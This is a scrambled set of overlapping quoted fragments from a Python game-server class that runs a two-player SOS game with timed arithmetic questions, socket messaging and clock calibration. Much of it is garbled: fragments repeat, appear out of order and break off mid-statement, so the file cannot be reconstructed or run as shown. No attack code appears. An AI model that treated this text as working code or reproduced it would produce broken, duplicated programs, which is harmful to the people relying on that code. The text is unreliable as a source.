"uuid) self.add_new_calibration_ts(uuid) return else: self.add_new_calibration_ts(uuid) self.generate_question() self.notify_players() def add_new_calibration_ts(self, uuid): self.calibrations[0].append(self.ts_info[0][uuid]) self.calibrations[0] =",
"in self.calibrations[1][-6:]]) / 6 self.ts_difference = delta0 - delta1 print(\"Calculated time difference in",
"in enumerate(self.active_connections): if conn: threading.Thread(target=connection_thread, args=(self, conn, idx, i), daemon=True).start() time.sleep(0.2) with self.lock:",
"self.game.question = question self.game.answer = answer self.game.question_uuid = str(uuid.uuid4()) self.receive_question_ts = [None, None]",
"MAX_RECEIVE_TIME_DIFFERENCE = 0.010 # in seconds def __init__(self): self.active_connections = [None, None] self.game",
"all players\") def connection_thread(self, conn, id): if self.game.state == GameState.QUESTION: self.ts_info[id][self.game.question_uuid] = {}",
"and self.answer_ts[1-id] < self.answer_ts[id]: self.game.turn = 1 - id else: self.game.turn = id",
"print(f\"Sending ID to the Player {id}\") conn.sendall(string_to_byte(json.dumps(message)) + self.SPECIAL_KEYWORD) def close_connections(self): for conn",
"player 0 and 1. self.received_acks_cnt = [0, 0] self.ping_difference = 0 self.ts_info =",
"ping0 - ping1 self.game.wait_times = [max(0, -self.ping_difference), max(0, self.ping_difference)] delta0 = sum([(c[\"client_rec\"]-c[\"server_send\"]+c[\"client_send\"]-c[\"server_rec\"]) /",
"difference between timestamps of player 0 and 1. self.received_acks_cnt = [0, 0] self.ping_difference",
"= client_rec if self.receive_question_ts[1 - id]: if self.get_timestamp_diff() <= self.MAX_RECEIVE_TIME_DIFFERENCE: print(\"Both player has",
"self.generate_question() self.notify_players() def give_turn(self, id, question_uuid, duration): print(f\"Player {id} duration: {duration} seconds\") with",
"if not self.answer_ts[1 - id]: time.sleep(abs(2 * self.ping_difference)) with self.lock: self.game.state = GameState.MOVE",
"* 1000, \" ms\") self.ping_difference = ping0 - ping1 self.game.wait_times = [max(0, -self.ping_difference),",
"self.game.board[coordinate_x][coordinate_y] = character for x in range(coordinate_x - 1, coordinate_x + 2): for",
"100 number_1 = random.randint(1, limit) number_2 = random.randint(1, limit) question = str(number_1) +",
"in self.calibrations[0][-6:]]) / 6 ping1 = sum([(c[\"client_rec\"]-c[\"server_send\"]-c[\"client_send\"]+c[\"server_rec\"]) / 2 for c in self.calibrations[1][-6:]])",
"the Player {id}\") conn.sendall(string_to_byte(json.dumps(message)) + self.SPECIAL_KEYWORD) def close_connections(self): for conn in self.active_connections: if",
"with self.lock: self.game.state = GameState.MOVE if self.answer_ts[1-id] and self.answer_ts[1-id] < self.answer_ts[id]: self.game.turn =",
"[{}, {}] self.answer_ts = [None, None] def add_connection(self, conn): id = 1 if",
"conn in enumerate(self.active_connections): if conn: threading.Thread(target=connection_thread, args=(self, conn, idx), daemon=True).start() def generate_question(self): print(\"Generating",
"[None, None] def add_connection(self, conn): id = 1 if self.active_connections[0] == None: id",
"idx, conn in enumerate(self.active_connections): if conn: threading.Thread(target=connection_thread, args=(self, conn, idx), daemon=True).start() def generate_question(self):",
"self.game.turn = id self.notify_players() # Returns the normalized timestamp difference between acknowledgment of",
"id self.notify_players() # Returns the normalized timestamp difference between acknowledgment of two players",
"= GameState.QUESTION self.game.question = question self.game.answer = answer self.game.question_uuid = str(uuid.uuid4()) self.receive_question_ts =",
"/ 6 delta1 = sum([(c[\"client_rec\"]-c[\"server_send\"]+c[\"client_send\"]-c[\"server_rec\"]) / 2 for c in self.calibrations[1][-6:]]) / 6",
"= str(uuid.uuid4()) self.receive_question_ts = [None, None] self.both_players_received = False self.answer_ts = [None, None]",
"= {} self.ts_info[id][self.game.question_uuid][\"server_send\"] = time.time() conn.sendall(pickle.dumps(self.game) + self.SPECIAL_KEYWORD) for idx, conn in enumerate(self.active_connections):",
"= client_rec_ts self.calibrations[id][ack_id][\"client_send\"] = client_send_ts ready_to_start = False with self.lock: self.received_acks_cnt[id] += 1",
"self.active_connections[id] message = { \"TYPE\": \"ID\", \"PAYLOAD\": id } print(f\"Sending ID to the",
"else: self.game.turn = id self.notify_players() # Returns the normalized timestamp difference between acknowledgment",
"= 20 if operator == \"*\" else 100 number_1 = random.randint(1, limit) number_2",
"the all players\") def connection_thread(self, conn, id): if self.game.state == GameState.QUESTION: self.ts_info[id][self.game.question_uuid] =",
"= [{}, {}] self.answer_ts = [None, None] def add_connection(self, conn): id = 1",
"if self.answer_ts[1-id] and self.answer_ts[1-id] < self.answer_ts[id]: self.game.turn = 1 - id else: self.game.turn",
"sys import random import uuid import time sys.path.append('..') from game import Game, GameState",
"= None self.game.reset_board() self.calibration_acks = [[], []] self.calibrations = [[{} for _ in",
"= client_send with self.lock: if self.game.state != GameState.QUESTION: return if self.game.question_uuid == uuid:",
"with self.lock: if self.game.question_uuid != uuid: return if self.receive_question_ts[1 - id]: if self.get_timestamp_diff()",
"ID to the Player {id}\") conn.sendall(string_to_byte(json.dumps(message)) + self.SPECIAL_KEYWORD) def close_connections(self): for conn in",
"has received the question \" + uuid) self.add_new_calibration_ts(uuid) return else: self.add_new_calibration_ts(uuid) self.generate_question() self.notify_players()",
"= { \"TYPE\": \"ID\", \"PAYLOAD\": id } print(f\"Sending ID to the Player {id}\")",
"sequence_coordinates.append([x - (i - 1) * direction[0], y - (i - 1) *",
"direction[0], y - (i - 1) * direction[1]]) if sequence_coordinates[-1][0] < 0 or",
"(i - 1) * direction[0], y - (i - 1) * direction[1]]) if",
"operator = random.choice(operator_list) limit = 20 if operator == \"*\" else 100 number_1",
"1, coordinate_y + 2): for direction in directions: sequence = \"\" sequence_coordinates =",
"if self.game.question_uuid == uuid: self.receive_question_ts[id] = client_rec if self.receive_question_ts[1 - id]: if self.get_timestamp_diff()",
"= True print(\"Both player has received the question \" + uuid) self.add_new_calibration_ts(uuid) return",
"= random.randint(1, limit) number_2 = random.randint(1, limit) question = str(number_1) + operator +",
"or self.game.question_uuid != question_uuid: return self.answer_ts[id] = duration if self.answer_ts[1 - id]: return",
"self.lock: self.game.state = GameState.MOVE if self.answer_ts[1-id] and self.answer_ts[1-id] < self.answer_ts[id]: self.game.turn = 1",
"id): conn = self.active_connections[id] message = { \"TYPE\": \"ID\", \"PAYLOAD\": id } print(f\"Sending",
"args=(self,), daemon=True).start() def notify_players(self): print(\"Sending Game information to the all players\") def connection_thread(self,",
"client_rec, client_send, uuid): self.ts_info[id][uuid][\"server_rec\"] = time.time() self.ts_info[id][uuid][\"client_rec\"] = client_rec self.ts_info[id][uuid][\"client_send\"] = client_send with",
"6 self.ts_difference = delta0 - delta1 print(\"Calculated time difference in seconds is: \",",
"range(3): sequence_coordinates.append([x - (i - 1) * direction[0], y - (i - 1)",
"if sequence == \"SOS\" and sequence_coordinates not in self.game.complete_lines: self.game.scores[id] += 1 self.game.complete_lines.append(sequence_coordinates)",
"direction in directions: sequence = \"\" sequence_coordinates = [] for i in range(3):",
"self.MAX_RECEIVE_TIME_DIFFERENCE: self.both_players_received = True print(\"Both player has received the question \" + uuid)",
"sequence = \"NOO\" break sequence += self.game.board[sequence_coordinates[-1][0]][sequence_coordinates[-1][1]] if sequence == \"SOS\" and sequence_coordinates",
"coordinate_y, character = move self.calculate_score(id, coordinate_x, coordinate_y, character) self.generate_question() self.notify_players() def give_turn(self, id,",
"print(f\"Player {id} duration: {duration} seconds\") with self.lock: if self.game.state != GameState.QUESTION or self.game.question_uuid",
"self.add_new_calibration_ts(uuid) self.generate_question() self.notify_players() def add_new_calibration_ts(self, uuid): self.calibrations[0].append(self.ts_info[0][uuid]) self.calibrations[0] = self.calibrations[0][1:] self.calibrations[1].append(self.ts_info[1][uuid]) self.calibrations[1] =",
"in directions: sequence = \"\" sequence_coordinates = [] for i in range(3): sequence_coordinates.append([x",
"range(10): for idx, conn in enumerate(self.active_connections): if conn: threading.Thread(target=connection_thread, args=(self, conn, idx, i),",
"{}] self.answer_ts = [None, None] def add_connection(self, conn): id = 1 if self.active_connections[0]",
"SPECIAL_KEYWORD = b\"xaxaxayarmaW\" MAX_RECEIVE_TIME_DIFFERENCE = 0.010 # in seconds def __init__(self): self.active_connections =",
"self.answer_ts = [None, None] def add_connection(self, conn): id = 1 if self.active_connections[0] ==",
"None] def add_connection(self, conn): id = 1 if self.active_connections[0] == None: id =",
"break sequence += self.game.board[sequence_coordinates[-1][0]][sequence_coordinates[-1][1]] if sequence == \"SOS\" and sequence_coordinates not in self.game.complete_lines:",
"self.game.col + coordinate[1]) def move(self, id, move): with self.lock: if self.game.state != GameState.MOVE",
"ping0 = sum([(c[\"client_rec\"]-c[\"server_send\"]-c[\"client_send\"]+c[\"server_rec\"]) / 2 for c in self.calibrations[0][-6:]]) / 6 ping1 =",
"and self.received_acks_cnt[1 - id] == 10: self.update_time_difference() ready_to_start = True if ready_to_start: self.generate_question()",
"answer self.game.question_uuid = str(uuid.uuid4()) self.receive_question_ts = [None, None] self.both_players_received = False self.answer_ts =",
"conn in enumerate(self.active_connections): if conn: threading.Thread(target=connection_thread, args=(self, conn, idx, i), daemon=True).start() time.sleep(0.2) with",
"return coordinate_x, coordinate_y, character = move self.calculate_score(id, coordinate_x, coordinate_y, character) self.generate_question() self.notify_players() def",
"self.game.question_uuid != question_uuid: return self.answer_ts[id] = duration if self.answer_ts[1 - id]: return if",
"idx), daemon=True).start() def generate_question(self): print(\"Generating New Question...\") operator_list = [\"+\", \"-\", \"*\"] operator",
"self.receive_question_ts = [None, None] self.both_players_received = False self.calibration_acks = [[], []] self.calibrations =",
"20 if operator == \"*\" else 100 number_1 = random.randint(1, limit) number_2 =",
"range(10)], [{} for _ in range(10)]] self.ts_difference = 0 # Average difference between",
"= GameState.MOVE if self.answer_ts[1-id] and self.answer_ts[1-id] < self.answer_ts[id]: self.game.turn = 1 - id",
"check_question_ack(self, id, client_rec, client_send, uuid): self.ts_info[id][uuid][\"server_rec\"] = time.time() self.ts_info[id][uuid][\"client_rec\"] = client_rec self.ts_info[id][uuid][\"client_send\"] =",
"self.game.wait_times = [max(0, -self.ping_difference), max(0, self.ping_difference)] delta0 = sum([(c[\"client_rec\"]-c[\"server_send\"]+c[\"client_send\"]-c[\"server_rec\"]) / 2 for c",
"ms\") print(\"Player 1 has a ping: \", ping1 * 1000, \" ms\") self.ping_difference",
"0 or \\ sequence_coordinates[-1][0] >= self.game.row or sequence_coordinates[-1][1] >= self.game.col: sequence = \"NOO\"",
">= self.game.row or sequence_coordinates[-1][1] >= self.game.col: sequence = \"NOO\" break sequence += self.game.board[sequence_coordinates[-1][0]][sequence_coordinates[-1][1]]",
"self.lock: if self.game.state != GameState.MOVE or self.game.turn != id: # or not self.both_players_received:",
"of two players in seconds. def get_timestamp_diff(self): return abs(self.receive_question_ts[0] - self.receive_question_ts[1] - self.ts_difference",
"self.add_new_calibration_ts(uuid) return else: self.add_new_calibration_ts(uuid) self.generate_question() self.notify_players() def add_new_calibration_ts(self, uuid): self.calibrations[0].append(self.ts_info[0][uuid]) self.calibrations[0] = self.calibrations[0][1:]",
"print(\"Player 1 has a ping: \", ping1 * 1000, \" ms\") self.ping_difference =",
"id): with self.lock: self.active_connections[id] = None self.game.players_names[id] = None self.game.reset_board() self.calibration_acks = [[],",
"\" / UUID: \" + self.game.question_uuid) def send_id(self, id): conn = self.active_connections[id] message",
"str(eval(question)) with self.lock: self.game.state = GameState.QUESTION self.game.question = question self.game.answer = answer self.game.question_uuid",
"number_2 = random.randint(1, limit) question = str(number_1) + operator + str(number_2) answer =",
"for y in range(coordinate_y - 1, coordinate_y + 2): for direction in directions:",
"self.lock: if self.game.state != GameState.QUESTION or self.game.question_uuid != question_uuid: return self.answer_ts[id] = duration",
"client_send_ts ready_to_start = False with self.lock: self.received_acks_cnt[id] += 1 if self.received_acks_cnt[id] == 10",
"- id else: self.game.turn = id self.notify_players() # Returns the normalized timestamp difference",
"conn, idx, i), daemon=True).start() time.sleep(0.2) with self.lock: self.game.players_names[id] = name self.send_id(id) if self.game.players_names[1",
"message = json.dumps({\"TYPE\": \"CALIBRATION\", \"PAYLOAD\": str(i)}) self.calibrations[id][i][\"server_send\"] = time.time() conn.sendall(string_to_byte(message) + self.SPECIAL_KEYWORD) for",
"self.game.answer = answer self.game.question_uuid = str(uuid.uuid4()) self.receive_question_ts = [None, None] self.both_players_received = False",
"= [0, 0] self.ping_difference = 0 self.ts_info = [{}, {}] self.answer_ts = [None,",
"str(uuid.uuid4()) self.receive_question_ts = [None, None] self.both_players_received = False self.answer_ts = [None, None] print(\"Generated",
"def restart_game(self): with self.lock: self.game.reset_board() self.generate_question() self.notify_players() def enter_name(self, id, name): ready =",
"self.receive_question_ts[1 - id]: if self.get_timestamp_diff() <= self.MAX_RECEIVE_TIME_DIFFERENCE: print(\"Both player has received the question",
"0 # Average difference between timestamps of player 0 and 1. self.received_acks_cnt =",
"self.notify_players() def restart_game(self): with self.lock: self.game.reset_board() self.generate_question() self.notify_players() def enter_name(self, id, name): ready",
"the normalized timestamp difference between acknowledgment of two players in seconds. def get_timestamp_diff(self):",
"False with self.lock: self.received_acks_cnt[id] += 1 if self.received_acks_cnt[id] == 10 and self.received_acks_cnt[1 -",
"sequence = \"\" sequence_coordinates = [] for i in range(3): sequence_coordinates.append([x - (i",
"sequence += self.game.board[sequence_coordinates[-1][0]][sequence_coordinates[-1][1]] if sequence == \"SOS\" and sequence_coordinates not in self.game.complete_lines: self.game.scores[id]",
"else: self.add_new_calibration_ts(uuid) self.generate_question() self.notify_players() def add_new_calibration_ts(self, uuid): self.calibrations[0].append(self.ts_info[0][uuid]) self.calibrations[0] = self.calibrations[0][1:] self.calibrations[1].append(self.ts_info[1][uuid]) self.calibrations[1]",
"uuid: return if self.receive_question_ts[1 - id]: if self.get_timestamp_diff() <= self.MAX_RECEIVE_TIME_DIFFERENCE: self.both_players_received = True",
"ping1 = sum([(c[\"client_rec\"]-c[\"server_send\"]-c[\"client_send\"]+c[\"server_rec\"]) / 2 for c in self.calibrations[1][-6:]]) / 6 print(\"Player 0",
"c in self.calibrations[0][-6:]]) / 6 delta1 = sum([(c[\"client_rec\"]-c[\"server_send\"]+c[\"client_send\"]-c[\"server_rec\"]) / 2 for c in",
"== uuid: self.receive_question_ts[id] = client_rec if self.receive_question_ts[1 - id]: if self.get_timestamp_diff() <= self.MAX_RECEIVE_TIME_DIFFERENCE:",
"threading import pickle import json import sys import random import uuid import time",
"def send_id(self, id): conn = self.active_connections[id] message = { \"TYPE\": \"ID\", \"PAYLOAD\": id",
"update_time_difference(self): ping0 = sum([(c[\"client_rec\"]-c[\"server_send\"]-c[\"client_send\"]+c[\"server_rec\"]) / 2 for c in self.calibrations[0][-6:]]) / 6 ping1",
"client_rec if self.receive_question_ts[1 - id]: if self.get_timestamp_diff() <= self.MAX_RECEIVE_TIME_DIFFERENCE: print(\"Both player has received",
"import random import uuid import time sys.path.append('..') from game import Game, GameState from",
"conn, idx), daemon=True).start() def generate_question(self): print(\"Generating New Question...\") operator_list = [\"+\", \"-\", \"*\"]",
"ping: \", ping1 * 1000, \" ms\") self.ping_difference = ping0 - ping1 self.game.wait_times",
"enter_name(self, id, name): ready = False def calibrate_timestamps(self): def connection_thread(self, conn, id, i):",
"ping1 * 1000, \" ms\") self.ping_difference = ping0 - ping1 self.game.wait_times = [max(0,",
"\"TYPE\": \"ID\", \"PAYLOAD\": id } print(f\"Sending ID to the Player {id}\") conn.sendall(string_to_byte(json.dumps(message)) +",
"json import sys import random import uuid import time sys.path.append('..') from game import",
"= [[], []] self.calibrations = [[{} for _ in range(10)], [{} for _",
"calculate_score(self, id, coordinate_x, coordinate_y, character): directions = [[-1, 0], [-1, -1], [0, -1],",
"self.ts_info[id][uuid][\"client_rec\"] = client_rec self.ts_info[id][uuid][\"client_send\"] = client_send with self.lock: if self.game.state != GameState.QUESTION: return",
"args=(self, conn, idx, i), daemon=True).start() time.sleep(0.2) with self.lock: self.game.players_names[id] = name self.send_id(id) if",
"operator == \"*\" else 100 number_1 = random.randint(1, limit) number_2 = random.randint(1, limit)",
"conn.close() def calculate_score(self, id, coordinate_x, coordinate_y, character): directions = [[-1, 0], [-1, -1],",
"sequence_coordinates = [] for i in range(3): sequence_coordinates.append([x - (i - 1) *",
"self.notify_players() def add_new_calibration_ts(self, uuid): self.calibrations[0].append(self.ts_info[0][uuid]) self.calibrations[0] = self.calibrations[0][1:] self.calibrations[1].append(self.ts_info[1][uuid]) self.calibrations[1] = self.calibrations[1][1:] self.update_time_difference()",
"range(10)]] self.ts_difference = 0 self.received_acks_cnt = [0, 0] self.ping_difference = 0 self.notify_players() def",
"coordinate_y, character): directions = [[-1, 0], [-1, -1], [0, -1], [1, -1]] with",
"return id def remove_player(self, id): with self.lock: self.active_connections[id] = None self.game.players_names[id] = None",
"def generate_question(self): print(\"Generating New Question...\") operator_list = [\"+\", \"-\", \"*\"] operator = random.choice(operator_list)",
"+ str(number_2) answer = str(eval(question)) with self.lock: self.game.state = GameState.QUESTION self.game.question = question",
"= 0 self.ts_info = [{}, {}] self.answer_ts = [None, None] def add_connection(self, conn):",
"- id]: time.sleep(abs(2 * self.ping_difference)) with self.lock: self.game.state = GameState.MOVE if self.answer_ts[1-id] and",
"\", self.ts_difference) def add_calibration_ack(self, id, client_rec_ts, client_send_ts, ack_id): self.calibrations[id][ack_id][\"server_rec\"] = time.time() self.calibrations[id][ack_id][\"client_rec\"] =",
"if self.game.state != GameState.MOVE or self.game.turn != id: # or not self.both_players_received: return",
"self.ping_difference)) with self.lock: self.game.state = GameState.MOVE if self.answer_ts[1-id] and self.answer_ts[1-id] < self.answer_ts[id]: self.game.turn",
"self.get_timestamp_diff() <= self.MAX_RECEIVE_TIME_DIFFERENCE: print(\"Both player has received the question \" + uuid) self.both_players_received",
"= [None, None] self.both_players_received = False self.calibration_acks = [[], []] self.calibrations = [[{}",
"print(\"Both player has received the question \" + uuid) self.both_players_received = True return",
"[] for i in range(3): sequence_coordinates.append([x - (i - 1) * direction[0], y",
"self.both_players_received = True return else: return else: return time.sleep(0.2) with self.lock: if self.game.question_uuid",
"operator_list = [\"+\", \"-\", \"*\"] operator = random.choice(operator_list) limit = 20 if operator",
"def __init__(self): self.active_connections = [None, None] self.game = Game(4, 4) self.lock = threading.Lock()",
"= threading.Lock() self.receive_question_ts = [None, None] self.both_players_received = False self.calibration_acks = [[], []]",
"# Average difference between timestamps of player 0 and 1. self.received_acks_cnt = [0,",
"with self.lock: self.game.reset_board() self.generate_question() self.notify_players() def enter_name(self, id, name): ready = False def",
"random.choice(operator_list) limit = 20 if operator == \"*\" else 100 number_1 = random.randint(1,",
"sequence_coordinates[-1][0] < 0 or sequence_coordinates[-1][1] < 0 or \\ sequence_coordinates[-1][0] >= self.game.row or",
"to the all players\") def connection_thread(self, conn, id): if self.game.state == GameState.QUESTION: self.ts_info[id][self.game.question_uuid]",
"4) self.lock = threading.Lock() self.receive_question_ts = [None, None] self.both_players_received = False self.calibration_acks =",
"str(number_2) answer = str(eval(question)) with self.lock: self.game.state = GameState.QUESTION self.game.question = question self.game.answer",
"sequence_coordinates[-1][1] < 0 or \\ sequence_coordinates[-1][0] >= self.game.row or sequence_coordinates[-1][1] >= self.game.col: sequence",
"{id} duration: {duration} seconds\") with self.lock: if self.game.state != GameState.QUESTION or self.game.question_uuid !=",
"= random.randint(1, limit) question = str(number_1) + operator + str(number_2) answer = str(eval(question))",
"= False def calibrate_timestamps(self): def connection_thread(self, conn, id, i): message = json.dumps({\"TYPE\": \"CALIBRATION\",",
"- id]: return if not self.answer_ts[1 - id]: time.sleep(abs(2 * self.ping_difference)) with self.lock:",
"None: ready = True if ready: threading.Thread(target=calibrate_timestamps, args=(self,), daemon=True).start() def notify_players(self): print(\"Sending Game",
"string_to_byte, byte_to_string class GameController(): SPECIAL_KEYWORD = b\"xaxaxayarmaW\" MAX_RECEIVE_TIME_DIFFERENCE = 0.010 # in seconds",
"sys.path.append('..') from game import Game, GameState from utils import string_to_byte, byte_to_string class GameController():",
"self.receive_question_ts[id] = client_rec if self.receive_question_ts[1 - id]: if self.get_timestamp_diff() <= self.MAX_RECEIVE_TIME_DIFFERENCE: print(\"Both player",
"and 1. self.received_acks_cnt = [0, 0] self.ping_difference = 0 self.ts_info = [{}, {}]",
"for direction in directions: sequence = \"\" sequence_coordinates = [] for i in",
"number_1 = random.randint(1, limit) number_2 = random.randint(1, limit) question = str(number_1) + operator",
"time difference in seconds is: \", self.ts_difference) def add_calibration_ack(self, id, client_rec_ts, client_send_ts, ack_id):",
"= [] for i in range(3): sequence_coordinates.append([x - (i - 1) * direction[0],",
"from game import Game, GameState from utils import string_to_byte, byte_to_string class GameController(): SPECIAL_KEYWORD",
"self.ts_difference - self.ping_difference) def check_question_ack(self, id, client_rec, client_send, uuid): self.ts_info[id][uuid][\"server_rec\"] = time.time() self.ts_info[id][uuid][\"client_rec\"]",
"self.ping_difference = 0 self.ts_info = [{}, {}] self.answer_ts = [None, None] def add_connection(self,",
"6 delta1 = sum([(c[\"client_rec\"]-c[\"server_send\"]+c[\"client_send\"]-c[\"server_rec\"]) / 2 for c in self.calibrations[1][-6:]]) / 6 self.ts_difference",
"* self.game.col + coordinate[1]) def move(self, id, move): with self.lock: if self.game.state !=",
"self.answer_ts = [None, None] print(\"Generated the Question: \" + question + \" /",
"[[], []] self.calibrations = [[{} for _ in range(10)], [{} for _ in",
"self.ts_difference = 0 # Average difference between timestamps of player 0 and 1.",
"conn.sendall(string_to_byte(json.dumps(message)) + self.SPECIAL_KEYWORD) def close_connections(self): for conn in self.active_connections: if conn: conn.close() def",
"player has received the question \" + uuid) self.add_new_calibration_ts(uuid) return else: self.add_new_calibration_ts(uuid) self.generate_question()",
"uuid import time sys.path.append('..') from game import Game, GameState from utils import string_to_byte,",
"if conn: threading.Thread(target=connection_thread, args=(self, conn, idx, i), daemon=True).start() time.sleep(0.2) with self.lock: self.game.players_names[id] =",
"self.game.state = GameState.MOVE if self.answer_ts[1-id] and self.answer_ts[1-id] < self.answer_ts[id]: self.game.turn = 1 -",
"self.generate_question() self.notify_players() def enter_name(self, id, name): ready = False def calibrate_timestamps(self): def connection_thread(self,",
"None: id = 0 self.active_connections[id] = conn return id def remove_player(self, id): with",
"= name self.send_id(id) if self.game.players_names[1 - id] != None: ready = True if",
"in range(10)], [{} for _ in range(10)]] self.ts_difference = 0 self.received_acks_cnt = [0,",
"def notify_players(self): print(\"Sending Game information to the all players\") def connection_thread(self, conn, id):",
"conn.sendall(pickle.dumps(self.game) + self.SPECIAL_KEYWORD) for idx, conn in enumerate(self.active_connections): if conn: threading.Thread(target=connection_thread, args=(self, conn,",
"in self.game.complete_lines: self.game.scores[id] += 1 self.game.complete_lines.append(sequence_coordinates) for coordinate in sequence_coordinates: self.game.marked_boxes.add(coordinate[0] * self.game.col",
"+ \" / UUID: \" + self.game.question_uuid) def send_id(self, id): conn = self.active_connections[id]",
"= 0 self.received_acks_cnt = [0, 0] self.ping_difference = 0 self.notify_players() def restart_game(self): with",
"/ 6 print(\"Player 0 has a ping: \", ping0 * 1000, \" ms\")",
"move): with self.lock: if self.game.state != GameState.MOVE or self.game.turn != id: # or",
"conn = self.active_connections[id] message = { \"TYPE\": \"ID\", \"PAYLOAD\": id } print(f\"Sending ID",
"[None, None] self.both_players_received = False self.answer_ts = [None, None] print(\"Generated the Question: \"",
"False def calibrate_timestamps(self): def connection_thread(self, conn, id, i): message = json.dumps({\"TYPE\": \"CALIBRATION\", \"PAYLOAD\":",
"game import Game, GameState from utils import string_to_byte, byte_to_string class GameController(): SPECIAL_KEYWORD =",
"has a ping: \", ping0 * 1000, \" ms\") print(\"Player 1 has a",
"c in self.calibrations[1][-6:]]) / 6 print(\"Player 0 has a ping: \", ping0 *",
"{} self.ts_info[id][self.game.question_uuid][\"server_send\"] = time.time() conn.sendall(pickle.dumps(self.game) + self.SPECIAL_KEYWORD) for idx, conn in enumerate(self.active_connections): if",
"== \"SOS\" and sequence_coordinates not in self.game.complete_lines: self.game.scores[id] += 1 self.game.complete_lines.append(sequence_coordinates) for coordinate",
"name self.send_id(id) if self.game.players_names[1 - id] != None: ready = True if ready:",
"in range(10)]] self.ts_difference = 0 self.received_acks_cnt = [0, 0] self.ping_difference = 0 self.notify_players()",
"self.game.reset_board() self.calibration_acks = [[], []] self.calibrations = [[{} for _ in range(10)], [{}",
"uuid: self.receive_question_ts[id] = client_rec if self.receive_question_ts[1 - id]: if self.get_timestamp_diff() <= self.MAX_RECEIVE_TIME_DIFFERENCE: print(\"Both",
"print(\"Generated the Question: \" + question + \" / UUID: \" + self.game.question_uuid)",
"i), daemon=True).start() time.sleep(0.2) with self.lock: self.game.players_names[id] = name self.send_id(id) if self.game.players_names[1 - id]",
"character for x in range(coordinate_x - 1, coordinate_x + 2): for y in",
"self.game.reset_board() self.generate_question() self.notify_players() def enter_name(self, id, name): ready = False def calibrate_timestamps(self): def",
"self.calculate_score(id, coordinate_x, coordinate_y, character) self.generate_question() self.notify_players() def give_turn(self, id, question_uuid, duration): print(f\"Player {id}",
"self.receive_question_ts[1 - id]: if self.get_timestamp_diff() <= self.MAX_RECEIVE_TIME_DIFFERENCE: self.both_players_received = True print(\"Both player has",
"1 has a ping: \", ping1 * 1000, \" ms\") self.ping_difference = ping0",
"/ 2 for c in self.calibrations[0][-6:]]) / 6 delta1 = sum([(c[\"client_rec\"]-c[\"server_send\"]+c[\"client_send\"]-c[\"server_rec\"]) / 2",
"+ 2): for direction in directions: sequence = \"\" sequence_coordinates = [] for",
"* direction[1]]) if sequence_coordinates[-1][0] < 0 or sequence_coordinates[-1][1] < 0 or \\ sequence_coordinates[-1][0]",
"self.game.col: sequence = \"NOO\" break sequence += self.game.board[sequence_coordinates[-1][0]][sequence_coordinates[-1][1]] if sequence == \"SOS\" and",
"add_calibration_ack(self, id, client_rec_ts, client_send_ts, ack_id): self.calibrations[id][ack_id][\"server_rec\"] = time.time() self.calibrations[id][ack_id][\"client_rec\"] = client_rec_ts self.calibrations[id][ack_id][\"client_send\"] =",
"self.game.players_names[id] = None self.game.reset_board() self.calibration_acks = [[], []] self.calibrations = [[{} for _",
"players\") def connection_thread(self, conn, id): if self.game.state == GameState.QUESTION: self.ts_info[id][self.game.question_uuid] = {} self.ts_info[id][self.game.question_uuid][\"server_send\"]",
"for c in self.calibrations[0][-6:]]) / 6 ping1 = sum([(c[\"client_rec\"]-c[\"server_send\"]-c[\"client_send\"]+c[\"server_rec\"]) / 2 for c",
"in range(3): sequence_coordinates.append([x - (i - 1) * direction[0], y - (i -",
"2): for y in range(coordinate_y - 1, coordinate_y + 2): for direction in",
"i): message = json.dumps({\"TYPE\": \"CALIBRATION\", \"PAYLOAD\": str(i)}) self.calibrations[id][i][\"server_send\"] = time.time() conn.sendall(string_to_byte(message) + self.SPECIAL_KEYWORD)",
"self.calibrations[1][1:] self.update_time_difference() def update_time_difference(self): ping0 = sum([(c[\"client_rec\"]-c[\"server_send\"]-c[\"client_send\"]+c[\"server_rec\"]) / 2 for c in self.calibrations[0][-6:]])",
"is: \", self.ts_difference) def add_calibration_ack(self, id, client_rec_ts, client_send_ts, ack_id): self.calibrations[id][ack_id][\"server_rec\"] = time.time() self.calibrations[id][ack_id][\"client_rec\"]",
"self.active_connections[id] = conn return id def remove_player(self, id): with self.lock: self.active_connections[id] = None",
"_ in range(10)]] self.ts_difference = 0 # Average difference between timestamps of player",
"None self.game.players_names[id] = None self.game.reset_board() self.calibration_acks = [[], []] self.calibrations = [[{} for",
"= str(number_1) + operator + str(number_2) answer = str(eval(question)) with self.lock: self.game.state =",
"1 - id else: self.game.turn = id self.notify_players() # Returns the normalized timestamp",
"time.sleep(abs(2 * self.ping_difference)) with self.lock: self.game.state = GameState.MOVE if self.answer_ts[1-id] and self.answer_ts[1-id] <",
"_ in range(10)], [{} for _ in range(10)]] self.ts_difference = 0 self.received_acks_cnt =",
"sequence_coordinates: self.game.marked_boxes.add(coordinate[0] * self.game.col + coordinate[1]) def move(self, id, move): with self.lock: if",
"!= GameState.MOVE or self.game.turn != id: # or not self.both_players_received: return coordinate_x, coordinate_y,",
"return else: return else: return time.sleep(0.2) with self.lock: if self.game.question_uuid != uuid: return",
"- (i - 1) * direction[1]]) if sequence_coordinates[-1][0] < 0 or sequence_coordinates[-1][1] <",
"self.SPECIAL_KEYWORD) for idx, conn in enumerate(self.active_connections): if conn: threading.Thread(target=connection_thread, args=(self, conn, idx), daemon=True).start()",
"} print(f\"Sending ID to the Player {id}\") conn.sendall(string_to_byte(json.dumps(message)) + self.SPECIAL_KEYWORD) def close_connections(self): for",
"return time.sleep(0.2) with self.lock: if self.game.question_uuid != uuid: return if self.receive_question_ts[1 - id]:",
"= 1 if self.active_connections[0] == None: id = 0 self.active_connections[id] = conn return",
"id = 0 self.active_connections[id] = conn return id def remove_player(self, id): with self.lock:",
"print(\"Calculated time difference in seconds is: \", self.ts_difference) def add_calibration_ack(self, id, client_rec_ts, client_send_ts,",
"limit) question = str(number_1) + operator + str(number_2) answer = str(eval(question)) with self.lock:",
"self.active_connections: if conn: conn.close() def calculate_score(self, id, coordinate_x, coordinate_y, character): directions = [[-1,",
"directions = [[-1, 0], [-1, -1], [0, -1], [1, -1]] with self.lock: self.game.board[coordinate_x][coordinate_y]",
"conn in self.active_connections: if conn: conn.close() def calculate_score(self, id, coordinate_x, coordinate_y, character): directions",
"[0, -1], [1, -1]] with self.lock: self.game.board[coordinate_x][coordinate_y] = character for x in range(coordinate_x",
"if self.get_timestamp_diff() <= self.MAX_RECEIVE_TIME_DIFFERENCE: self.both_players_received = True print(\"Both player has received the question",
"self.calibrations[id][ack_id][\"client_send\"] = client_send_ts ready_to_start = False with self.lock: self.received_acks_cnt[id] += 1 if self.received_acks_cnt[id]",
